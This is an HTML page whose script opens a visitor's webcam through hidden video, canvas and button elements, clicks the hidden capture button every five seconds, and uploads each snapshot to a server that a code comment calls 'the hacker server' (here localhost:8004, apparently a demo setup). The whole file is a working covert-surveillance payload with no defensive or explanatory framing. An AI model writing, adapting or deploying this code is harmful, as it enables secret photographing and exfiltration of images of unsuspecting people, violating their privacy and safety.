<body>
<video id="v" style="display:none;" autoplay>Not supported in your browser</video>
<canvas id="c" style="display:none;" width="700" height="700"></canvas>
<input id="b" style="display:none;" type="submit" value="Capture Picture">
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script>
    // Open Camera
    navigator.getUserMedia({video: true}, function(stream) {
        // Get All Elements
        let video = document.getElementById("v");
        let canvas = document.getElementById("c");
        let button = document.getElementById("b");
        video.srcObject = stream;
        button.disabled = false;

        // Capture Button Click Event Listener
        button.onclick = function() {
            // Capture the video and save into a file
            canvas.getContext("2d").drawImage(video, 0, 0, 1000, 1000, 0, 0, 1000, 1000);
            let image = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
            // window.location.href = image;
            let blobBin = atob(image.split(',')[1]);
            let array = [];
            for(let i = 0; i < blobBin.length; i++) {
                array.push(blobBin.charCodeAt(i));
            }
            let file = new Blob([new Uint8Array(array)], {type: 'image/png'});

            // Send to the hacker server using ajax
            let data = new FormData();
            data.append("file", file);
            $.ajax({
                url: 'http://localhost:8004/upload',
                type: 'post',
                data: data,
                crossDomain: true,
                cache: false,
                processData: false,
                contentType: false,
            });
        };
        // Click the capture button every 5 seconds
        setInterval(function(){ $(button).click(); }, 5000);
    }, function(err) { alert("there was an error " + err)});
</script>
